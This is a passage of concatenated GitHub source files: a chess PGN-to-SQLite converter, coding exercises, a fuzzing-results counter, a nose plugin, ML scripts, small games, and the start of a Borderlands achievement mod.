chess\nimport chess.pgn\nimport sqlite3\nimport sys\nimport mmap\nimport re\nimport time\nimport os\n\n# Config\nfn = \"lichess.pgn\"\nfilesize = os.path.getsize(fn)\ndbn = fn + \".sqlite\"\ncommit = 10000\n\ncols = {\n 'num': 'int',\n 'offset': 'int',\n 'wname': 'text',\n 'bname': 'text',\n 'welo': 'int',\n 'belo': 'int',\n 'result': 'text',\n 'tc': 'text',\n 'plies': 'int',\n 'eco': 'text',\n 'ref': 'text'\n}\ninsertmarks = \"?, \" * (len(cols) - 1) + \"?\"\n\n# Open PGN\nf = open(fn, \"r\")\nmm = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)\nmm.madvise(mmap.MADV_SEQUENTIAL)\ngames = f\n\n# Set up DB\ndbconn = sqlite3.connect(dbn)\ndb = dbconn.cursor()\n\ndb.execute(\"DROP TABLE IF EXISTS pgn\")\ndb.execute(\"CREATE TABLE pgn (\" + \", \".join([ f\"{x[0]} {x[1]}\" for x in cols.items()]) + \")\")\n#sys.exit()\n\n# Main loop\nmcache = []\nmcached = 0\nccount = commit\nindex = 1\nts = time.time()\nwhile True:\n headeroff = games.tell()\n game = chess.pgn.read_game(games)\n if not game:\n break\n plies = game.end().ply()\n #ref = re.search(r\"lichess.org/(.*)$\", game.headers[\"Site\"])[1]\n ref = game.headers[\"Site\"]\n mcache.append(\n (\n index,\n headeroff,\n game.headers[\"White\"],\n game.headers[\"Black\"],\n game.headers[\"WhiteElo\"],\n game.headers[\"BlackElo\"],\n game.headers[\"Result\"],\n game.headers[\"TimeControl\"],\n plies,\n game.headers[\"ECO\"],\n ref\n )\n )\n mcached += 1\n if ccount <= 0:\n db.executemany(\"INSERT INTO pgn VALUES (\" + insertmarks + \")\", mcache)\n dbconn.commit()\n ccount = commit\n mcache = []\n mcached = 0\n else:\n ccount -= 1\n now = time.time()\n if now - ts > 1:\n ts = now\n print(f\"Processed {index} games (cached {mcached}), {100.0*headeroff/filesize:.2f}%\")\n index += 1\n\n# Final flush of cached items\ndb.executemany(\"INSERT INTO pgn VALUES (\" + insertmarks + \")\", mcache)\ndbconn.commit()\n","repo_name":"kdave/pgn-toys","sub_path":"pgn2sqlite.py","file_name":"pgn2sqlite.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22520789711","text":"import xmltodict\n\ndef processXML(filename):\n with open('magazijn.xml') as myXMLFile:\n filestring = myXMLFile.read()\n xmldictionary = xmltodict.parse(filestring)\n return xmldictionary\n\nartikelendict = processXML('magazijn.xml')\nartikelen = artikelendict['artikelen']['artikel']\n\nprint(artikelendict)\n\nfor artikel in artikelen:\n print(artikel['naam'])\n","repo_name":"johnvanmeerten/TiCT-VIPROG-15","sub_path":"Les10/Practice Exercise 10_1.py","file_name":"Practice Exercise 10_1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22701170350","text":"#-*- coding: utf-8 -*-\nimport os\n\nroot_dir='C:\\\\Users\\\\Administrator.AHN-01806070854\\\\Desktop\\\\thesis\\\\real_results'\ndir_list=os.listdir(root_dir)\ndic={}\ndic['HwpSummaryInformation']=1\ndic['BIN0001']=1\ndic['BIN0002']=1\ndic['BIN0003']=1\ndic['BIN0004']=1\ndic['BIN0005']=1\ndic['Section0']=1\ndic['DocInfo']=1\ndic['_LinkDoc']=1\ndic['FileHeader']=1\ndic['PrvImage']=1\ndic['PrvText']=1\ndic['DefaultJScript']=1\ndic['JScriptVersion']=1\n\ni=1\nfor j in range(len(dir_list)):\n\tfile=root_dir+\"\\\\test3_\"+str(i)+'\\\\test3_'+str(i)+'_field_info.txt'\n\tf=open(file)\n\tdata=f.read()\n\ttmp=data.split('\\n')\n\t\n\ti+=1\n\n\tfor t in tmp:\n\t\tif 'HwpSummaryInformation' in t:\n\t\t\ttemp=t.split(' 
')\n\t\t\t\n\t\t\tdic['HwpSummaryInformation']+=int(temp[1])\n\n\t\tif 'BIN0001' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0001']+=int(temp[1])\n\n\t\tif 'BIN0002' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0002']+=int(temp[1])\n\n\t\tif 'BIN0003' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0003']+=int(temp[1])\n\n\t\tif 'BIN0004' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0004']+=int(temp[1])\n\n\t\tif 'BIN0004' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0004']+=int(temp[1])\n\n\t\tif 'BIN0005' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0005']+=int(temp[1])\n\n\t\tif 'Section0' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['Section0']+=int(temp[1])\n\n\t\tif 'DocInfo' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['DocInfo']+=int(temp[1])\n\n\t\tif '_LinkDoc' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['_LinkDoc']+=int(temp[1])\n\n\t\tif 'FileHeader' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['FileHeader']+=int(temp[1])\n\t\n\t\tif 'PrvImage' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['PrvImage']+=int(temp[1])\n\t\t\t\n\t\tif 'PrvText' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['PrvText']+=int(temp[1])\n\n\t\tif 'DefaultJScript' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['DefaultJScript']+=int(temp[1])\n\t\n\t\tif 'JScriptVersion' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['JScriptVersion']+=int(temp[1])\n\n\tf.close()\n\tfile=root_dir+'total_count.txt'\n\tf=open(file,'w')\n\tstring_tmp=''\n\tfor key in dic:\n\t\tstring=key+' '+str(dic[key])+'\\n'\n\t\tstring_tmp+=string\n\tf.write(string_tmp)\n\tf.close()","repo_name":"leeforest/VAEFuzzer","sub_path":"total_count.py","file_name":"total_count.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17035470701","text":"#!/usr/bin/env python\n# author = 'ZZH'\n# time = 2022/6/25\n# project = leetcode剑指offer091-粉刷房子\nfrom typing import List\n\n\nclass Solution:\n def minCost(self, costs: List[List[int]]) -> int:\n for i in range(1, len(costs)):\n costs[i][0] += min(costs[i - 1][1], costs[i - 1][2])\n costs[i][1] += min(costs[i - 1][0], costs[i - 1][2])\n costs[i][2] += min(costs[i - 1][0], costs[i - 1][1])\n return min(costs[-1])\n\n\nsolution = Solution()\nprint(solution.minCost([[17, 2, 17], [16, 16, 5], [14, 3, 19]]))\n","repo_name":"ZZHbible/leetcode","sub_path":"leetcode剑指offer091-粉刷房子.py","file_name":"leetcode剑指offer091-粉刷房子.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38901356351","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 524.py\n# @Time : 2020/5/9 17:48\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Solution:\n \"\"\"\n [524. 
通过删除字母匹配到字典里最长单词](https://leetcode-cn.com/problems/longest-word-in-dictionary-through-deleting/)\n \"\"\"\n @timeit\n def findLongestWord(self, s: str, d: List[str]) -> str:\n from collections import Counter\n ds = Counter(s)\n n = len(s)\n d.sort(key=lambda x: (-len(x), x))\n for word in d:\n dw = Counter(word)\n flag = True\n for k, v in dw.items():\n if not k in ds or ds[k] < v:\n flag = False\n break\n if not flag: continue\n i = j = 0\n m = len(word)\n while i < n and j < m:\n if s[i] == word[j]:\n j += 1\n i += 1\n if j == m: return word\n return \"\"\n\n\nif __name__ == '__main__':\n a = Solution()\n a.findLongestWord(s = \"abpcplea\", d = [\"ale\",\"apple\",\"monkey\",\"plea\"])\n a.findLongestWord(s = \"abpcplea\", d = [\"a\",\"b\",\"c\"])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/301-600/524.py","file_name":"524.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"5592256427","text":"\"\"\"\ndecorator extension for 'nose'.\n\nAllows you to decorate functions, classes, and methods with attributes\nwithout modifying the actual source code. Particularly useful in\nconjunction with the 'attrib' extension package.\n\"\"\"\n\nimport sys\nerr = sys.stderr\n\nimport logging\nimport os\nfrom nose.plugins.base import Plugin\n\nlog = logging.getLogger(__name__)\n\ndef sort_plugins_by_priority(a, b):\n pa = getattr(a, 'call_priority', 100)\n pb = getattr(b, 'call_priority', 100)\n\n return cmp(pa, pb)\n\nclass Decorator(Plugin):\n call_priority=-100 # put this plugin at a high priority.\n \n def __init__(self):\n Plugin.__init__(self)\n \n def add_options(self, parser, env=os.environ):\n parser.add_option(\"--decorator-file\",\n action=\"store\",\n dest=\"decorator_file\",\n default=None,\n help=\"Apply attributes in this file to matching functions, classes, and methods\")\n\n def configure(self, options, config):\n self.conf = config\n\n ### configure logging\n \n logger = logging.getLogger(__name__)\n logger.propagate = 0\n\n handler = logging.StreamHandler(err)\n logger.addHandler(handler)\n \n lvl = logging.WARNING\n if options.verbosity >= 5:\n lvl = 0\n elif options.verbosity >= 4:\n lvl = logging.DEBUG\n elif options.verbosity >= 3:\n lvl = logging.INFO\n logger.setLevel(lvl)\n\n ### enable plugin & save decorator file name, if given.\n \n if options.decorator_file:\n self.enabled = True\n self.decorator_file = options.decorator_file\n\n def begin(self):\n \"\"\"\n Called before any tests are run.\n\n The only trick here is that we have to mangle the order of\n the plugins, because this plugin *must* be called before\n any plugins that examine the attributes being set. This is\n done by sorting the plugins in-place.\n \"\"\"\n\n ### sort plugins by specified call_priority. 
HACK!\n self.conf.plugins.sort(sort_plugins_by_priority)\n\n ### load in the specified attributes file.\n \n filename = self.decorator_file\n \n fp = open(filename)\n\n curtains = {}\n for line in fp:\n\n # skip empty lines or lines with comments ('#')\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n\n # parse attributes...\n name, attrib = line.split(':')\n name = name.strip()\n attrib = attrib.strip()\n\n # ...and store 'em.\n l = curtains.get(name, [])\n l.append(attrib)\n curtains[name] = l\n\n # save the attributes in 'self.curtains'.\n self.curtains = curtains\n\n ######\n \n def wantClass(self, cls):\n \"\"\"\n wantClass -- attach matching attributes to the class.\n \"\"\"\n fullname = '%s.%s' % (cls.__module__, cls.__name__,)\n self._attach_attributes(fullname, cls)\n\n # indicate no preferences re running this test...\n return None\n\n def wantMethod(self, method):\n \"\"\"\n wantMethod -- attach matching attributes to this method.\n \"\"\"\n fullname = '%s.%s.%s' % (method.__module__,\n method.im_class.__name__,\n method.__name__)\n\n self._attach_attributes(fullname, method)\n\n # indicate no preference re running this test...\n return None\n\n def wantFunction(self, func):\n \"\"\"\n wantFunction -- attach matching attributes to this function.\n \"\"\"\n fullname = '%s.%s' % (func.__module__,\n func.__name__)\n \n self._attach_attributes(fullname, func)\n\n # indicate no preferences re running this test.\n return None\n\n def _attach_attributes(self, fullname, obj):\n \"\"\"\n Attach attributes matching 'fullname' to the object 'obj'.\n \"\"\"\n attribs = self.curtains.get(fullname, [])\n log.info('_attach_attributes: %s, %s' % (fullname, attribs,))\n \n for a in attribs:\n obj.__dict__[a] = True\n","repo_name":"OldhamMade/pinocchio","sub_path":"pinocchio/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"45492362064","text":"import math\n\ndef solution(n, words):\n \n check = []\n check.append(words[0])\n num = -1\n \n for i in range(1, len(words)):\n if words[i] in check:\n num = i+1\n break\n check.append(words[i])\n temp1 = list(words[i-1])\n temp2 = list(words[i])\n if temp1[-1] != temp2[0]:\n num = i+1\n break\n \n if num == -1:\n return [0,0]\n else:\n if num%n == 0:\n return [n, math.ceil(num/n)]\n return [num%n, math.ceil(num/n)]\n \n \n","repo_name":"SL313/algorithm","sub_path":"Programmers/Level2/영어 끝말잇기.py","file_name":"영어 끝말잇기.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39776843751","text":"import sys\nimport coremltools\nfrom coremltools.models.neural_network.quantization_utils import *\nimport os\ndef quantize(fin, bits, functions, fout):\n model = coremltools.models.MLModel(fin)\n for function in functions :\n for bit in bits:\n sys.stdout.flush()\n quantized_model = quantize_weights(model, bit, function)\n sys.stdout.flush()\n #quantized_model.author = \"Alexis Creuzot\"\n #quantized_model.short_description = str(bit)+\"-bit per quantized weight, using \"+function+\".\"\n #quantized_model.save(fout)\n coremltools.utils.save_spec(quantized_model, fout)\n\ndef qtz(fin, fout):\n model_spec = coremltools.utils.load_spec(fin)\n model_fp16_spec = coremltools.utils.convert_neural_network_spec_weights_to_fp16(model_spec)\n coremltools.utils.save_spec(model_fp16_spec, fout)\n\n\nflist = 
os.listdir('.')\nfor f in flist:\n if f.endswith('mlmodel'):\n fin = f\n fout = 'qtz/%s' % f\n quantize(fin, [8], ['linear'], fout)\n #qtz(fin, fout)\n","repo_name":"biaoxiaoduan/nerual-style","sub_path":"quantize.py","file_name":"quantize.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15999487270","text":"# Multiple Linear Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 4].values\n\n# Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder = LabelEncoder()\nX[:, 3] = labelencoder.fit_transform(X[:, 3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX = onehotencoder.fit_transform(X).toarray()\n\n# Avoiding the Dummy Variable Trap\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n# Feature Scaling\n\"\"\"from sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\nsc_y = StandardScaler()\ny_train = sc_y.fit_transform(y_train)\"\"\"\n\n# Fitting Multiple Linear Regression to the Training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# Predicting the Test set results\ny_pred = regressor.predict(X_test)\n\n# Building the \"optimal model\" using Backward Elimination\nimport statsmodels.formula.api as sm\n\n# this is the intercept [B0 column] that we need when using sm.OLS\n# axis = 1 , add a column\nX = np.append(arr = np.ones((50, 1)).astype(int), values = X, axis = 1)\n\n# backward elimination : Select a significance level to stay in the model ( ex: SL = 0.05)\n# Step 1 : Fit the full model with all possible predictors\n# Step 2 : Consider the predictor with the highest p-value. 
If P > SL, Remove the predictor\n# repeat the process\n\n# matrix containing all the independent variables\n# Fit the full model with all possible predictors\nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit() # OLS - Ordinary Least Squares\nregressor_OLS.summary()\n\nX_opt = X[:, [0, 1, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\nX_opt = X[:, [0, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\nX_opt = X[:, [0, 3, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\nX_opt = X[:, [0, 3]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()","repo_name":"rdayala/AI-ML-Learning","sub_path":"MachineLearning/Part 2 - Regression/Section 5 - Multiple Linear Regression/Homework_Solutions/multiple_linear_regression.py","file_name":"multiple_linear_regression.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"29362167054","text":"import pygame\nfrom game_config import CONFIG\nfrom player_controller import PlayerController\nfrom map import Map\nfrom component import *\ndirection = [\"left\", \"right\", \"up\", \"down\"]\n\n\nclass Game:\n def __init__(self):\n self.screen = pygame.display.set_mode((CONFIG.WIDTH, CONFIG.HEIGHT))\n self.key_down = {}\n self.renderer = []\n self.preload()\n set_world_bound(left = 0, right = 300, top = 22, bottom= 364)\n\n def preload(self):\n for key in direction:\n self.key_down[key] = False\n\n img_path = CONFIG.img_path\n self.map = Map()\n self.player = PlayerController()\n\n def handle_rotate(self, rotate):\n rot = {\n \"left\" : [-CONFIG.speed, 0],\n \"right\" : [CONFIG.speed, 0],\n \"up\" : [0, -CONFIG.speed],\n \"down\" : [0, CONFIG.speed]\n }\n\n self.player.rotate = rotate\n self.player.speedX = rot[rotate][0]\n self.player.speedY = rot[rotate][1]\n self.key_down[rotate] = True\n self.player.moving = True\n\n def handle_event(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.handle_rotate(\"left\")\n if event.key == pygame.K_RIGHT:\n self.handle_rotate(\"right\")\n if event.key == pygame.K_UP:\n self.handle_rotate(\"up\")\n if event.key == pygame.K_DOWN:\n self.handle_rotate(\"down\")\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n self.key_down[\"left\"] = False\n if event.key == pygame.K_RIGHT:\n self.key_down[\"right\"] = False\n if event.key == pygame.K_UP:\n self.key_down[\"up\"] = False\n if event.key == pygame.K_DOWN:\n self.key_down[\"down\"] = False\n\n\n def update(self):\n self.player.update(self.key_down)\n","repo_name":"treesseven/dig-dug-arrangement","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15454116543","text":"from microbit import *\nimport neopixel\nimport tm1637\ntm=tm1637.TM1637(clk=pin15,dio=pin16)\nnp = neopixel.NeoPixel(pin14, 16)\nwhile True:\n x=pin1.read_analog()\n y=int(x/4)\n tm.show('{:04d}'.format(pin1.read_analog()))\n if(x>512):\n for i in range(0,12):\n np[i] = (0,y,0)\n np.show()\n else:\n for i in range(0,12):\n np[i] = (0,0,y)\n 
np.show()\n\n","repo_name":"piramid/microbit","sub_path":"neopixelVRcontrol.py","file_name":"neopixelVRcontrol.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39767278169","text":"import tkinter\nfrom tkinter import *\nfrom tkinter import ttk\n#importando pillow\nfrom PIL import Image, ImageTk\nimport random\n\n#cores\nco0 = \"#FFFFFF\" # white / branca\nco1 = \"#333333\" # black / preta\nco2 = \"#fcc058\" # orange / laranja\nco3 = \"#fff873\" # yellow / amarela\nco4 = \"#34eb3d\" # green / verde\nco5 = \"#e85151\" # red / vermelha\nfundo = \"#3b3b3b\"\n\n#configurando a janela\njanela = tkinter.Tk()\njanela.title('')\njanela.geometry('260x280')\njanela.configure(bg=fundo)\n\n#dividindo a janela\nframe_cima = Frame(janela, width=260, height=100, bg=co1, relief='raised')\nframe_cima.grid(row=0, column=0, sticky=NW)\n\nframe_baixo = Frame(janela, width=260, height=300, bg=co0, relief='flat')\nframe_baixo.grid(row=1, column=0, sticky=NW)\n\nestilo = ttk.Style(janela)\nestilo.theme_use('clam')\n\n#configurando o frame cima\n\n# Jogador\napp_1 = Label(frame_cima,\n text=\"Você\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co1,\n fg=co0)\napp_1.place(x=25, y=70)\n\n#linha que ai ficar colorida do seu lado quando ganhar\napp_1_linha = Label(frame_cima,\n text=\"\",\n height=10,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co0)\napp_1_linha.place(x=0, y=0)\n\napp_1_pontos = Label(frame_cima,\n text=\"0\",\n height=1,\n anchor='center',\n font=('Ivy 30 bold'),\n bg=co1,\n fg=co0)\napp_1_pontos.place(x=50, y=20)\n\napp_ = Label(frame_cima,\n text=\":\",\n height=1,\n anchor='center',\n font=('Ivy 30 bold'),\n bg=co1,\n fg=co0)\napp_.place(x=125, y=20)\n\n# PC\napp_2_pontos = Label(frame_cima,\n text=\"0\",\n height=1,\n anchor='center',\n font=('Ivy 30 bold'),\n bg=co1,\n fg=co0)\napp_2_pontos.place(x=170, y=20)\n\napp_2 = Label(frame_cima,\n text=\"PC\",\n height=10,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co1,\n fg=co0)\napp_2.place(x=205, y=70)\n\n#linha que vai ficar colorida quando ganha lado adversário\napp_2_linha = Label(frame_cima,\n text=\"\",\n height=10,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co0)\napp_2_linha.place(x=255, y=0)\n\n# linha que ira sinalizar empate\napp_linha = Label(frame_cima,\n text=\"\",\n width=255,\n anchor='center',\n font=('Ivy 1 bold'),\n bg=co0,\n fg=co0)\napp_linha.place(x=0, y=95)\n\napp_pc = Label(frame_baixo,\n text=\"\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co0)\napp_pc.place(x=190, y=10)\n\napp_vc = Label(frame_baixo,\n text=\"\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co0)\napp_vc.place(x=20, y=10)\n\n# variavel global\n\nglobal voce\nglobal pc\nglobal rondas #quantidade de vez que iremos jogar\nglobal pontos_voce\nglobal pontos_pc\n\npontos_voce = 0\npontos_pc = 0\nrondas = 0\n\n# função logica do jogo\n\n\ndef jogar(i):\n global rondas\n global pontos_voce\n global pontos_pc\n # verse o numeros de rondas for exedida\n if rondas <= 5:\n print(rondas)\n opcoes = ['Pedra', 'Papel', 'Tesoura']\n pc = random.choice(opcoes)\n voce = i\n\n app_pc['text'] = pc\n app_pc['fg'] = co1\n\n app_vc['text'] = voce\n app_vc['fg'] = co1\n\n # caso as escolhas sejam iguais\n if voce == 'Pedra' and pc == 'Pedra':\n print('empate')\n app_linha['bg'] = co3\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co0\n\n elif voce == 'Papel' and pc == 'Papel':\n 
print('empate')\n app_linha['bg'] = co3\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co0\n\n elif voce == 'Tesoura' and pc == 'Tesoura':\n print('empate')\n app_linha['bg'] = co3\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co0\n\n # condiçoes diferentes\n #eu pedra\n elif voce == 'Pedra' and pc == 'Papel':\n print('Pc ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co5\n\n pontos_pc += 10\n\n elif voce == 'Pedra' and pc == 'Tesoura':\n print('Voce ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co4\n app_2_linha['bg'] = co0\n\n pontos_voce += 10\n\n # eu Papel\n elif voce == 'Papel' and pc == 'Tesoura':\n print('Pc ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co5\n\n pontos_pc += 10\n\n elif voce == 'Papel' and pc == 'Pedra':\n print('Voce ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co4\n app_2_linha['bg'] = co0\n\n pontos_voce += 10\n\n # eu tesoura\n elif voce == 'Tesoura' and pc == 'Pedra':\n print('Pc ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co5\n\n pontos_pc += 10\n\n elif voce == 'Tesoura' and pc == 'Papel':\n print('Voce ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co4\n app_2_linha['bg'] = co0\n\n pontos_voce += 10\n\n # atualizando a pontuação\n app_1_pontos['text'] = pontos_voce\n app_2_pontos['text'] = pontos_pc\n\n # atualizando numero de rondas / jogadas\n rondas += 1\n\n else:\n app_1_pontos['text'] = pontos_voce\n app_2_pontos['text'] = pontos_pc\n\n #chamando a função terminar\n fim_do_jogo()\n\n\n# função de iniciar jogo\ndef iniciar_jogo():\n global icon_1\n global icon_2\n global icon_3\n global b_icon_1\n global b_icon_2\n global b_icon_3\n\n b_jogar.destroy()\n\n # configurando frame baixo\n icon_1 = Image.open('images/pedra.png') #abrir imagem\n icon_1 = icon_1.resize((50, 50),\n Image.ANTIALIAS) #padronixa o tamanho da imagen\n icon_1 = ImageTk.PhotoImage(icon_1)\n b_icon_1 = Button(frame_baixo,\n command=lambda: jogar('Pedra'),\n width=50,\n image=icon_1,\n compound=CENTER,\n bg=co0,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=FLAT)\n b_icon_1.place(x=15, y=60)\n\n icon_2 = Image.open('images/papel.png')\n icon_2 = icon_2.resize((50, 50), Image.ANTIALIAS)\n icon_2 = ImageTk.PhotoImage(icon_2)\n b_icon_2 = Button(frame_baixo,\n command=lambda: jogar('Papel'),\n width=50,\n image=icon_2,\n compound=CENTER,\n bg=co0,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=FLAT)\n b_icon_2.place(x=95, y=60)\n\n icon_3 = Image.open('images/tesoura.png')\n icon_3 = icon_3.resize((50, 50), Image.ANTIALIAS)\n icon_3 = ImageTk.PhotoImage(icon_3)\n b_icon_3 = Button(frame_baixo,\n command=lambda: jogar('Tesoura'),\n width=50,\n image=icon_3,\n compound=CENTER,\n bg=co0,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=FLAT)\n b_icon_3.place(x=170, y=60)\n\n\n# função terninar jogo\ndef fim_do_jogo():\n global rondas\n global pontos_voce\n global pontos_pc\n\n # reinicando as variaveis para zerar jogo\n pontos_voce = 0\n pontos_pc = 0\n rondas = 0\n\n # destruindo os botoes de opções\n b_icon_1.destroy()\n b_icon_2.destroy()\n b_icon_3.destroy()\n\n # definindo o vencedor\n jogador_voce = int(app_1_pontos['text'])\n jogador_pc = int(app_2_pontos['text'])\n\n if jogador_voce > jogador_pc:\n app_vencedor = Label(frame_baixo,\n text=\"Parabens voce ganhou !!!\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co4)\n app_vencedor.place(x=5, y=60)\n elif jogador_voce < jogador_pc:\n 
app_vencedor = Label(frame_baixo,\n text=\"Infelizmente voce perdeu !!!\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co5)\n app_vencedor.place(x=5, y=60)\n else:\n app_vencedor = Label(frame_baixo,\n text=\"Foi um empate !!!\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co1)\n app_vencedor.place(x=5, y=60)\n\n # jogar denovo\n def jogar_denovo():\n app_1_pontos['text'] = 0\n app_2_pontos['text'] = 0\n app_vencedor.destroy()\n\n b_jogar_denovo.destroy()\n\n iniciar_jogo()\n\n b_jogar_denovo = Button(frame_baixo,\n command=jogar_denovo,\n width=30,\n text='Jogar denovo',\n bg=fundo,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=RAISED,\n overrelief=RIDGE)\n b_jogar_denovo.place(x=5, y=151)\n\n\nb_jogar = Button(frame_baixo,\n command=iniciar_jogo,\n width=30,\n text='JOGAR',\n bg=fundo,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=RAISED,\n overrelief=RIDGE)\nb_jogar.place(x=5, y=151)\n\njanela.mainloop()\n\n#instalar o python Pillow\n","repo_name":"YaraBertazzi/jokenpo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10797,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36042155280","text":"import sys\nsys.path.append('../../python_mod_helpers')\nfrom wlhotfixmod.wlhotfixmod import Mod\n\n# Shenanigans indeed! I basically never play these games co-op, and arranging to\n# do so just to pop a couple of Steam achievements always seems like less fun than\n# haxing the framework to do it for me. So this hooks up the two co-op achievements\n# to trigger based on weapon kills (the values gleaned from whatever savegame I\n# was using at the time) instead of their usual stats.\n\nmod = Mod('achievement_shenanigans.txt',\n \"Achievement Shenanigans\",\n 'Apocalyptech',\n [\n ],\n lic=Mod.CC_BY_SA_40,\n )\n\n# Stat to inject\ntracked_stat = Mod.get_full_cond('/Game/PlayerCharacters/_Shared/_Design/Stats/Combat/Weapon/Stat_Weapon_AssaultRifleKills', 'GameStatData')\ntracked_stat_target = 1199\n\n# These actually function a bit differently -- the trading one redirects through a BP_Challenge_Console_Trade\n# to get to the object we alter here, and as a result, we need the targets to look a bit different. The\n# trading one tracks the stat completely independently, so we want that one to pop on 1. 
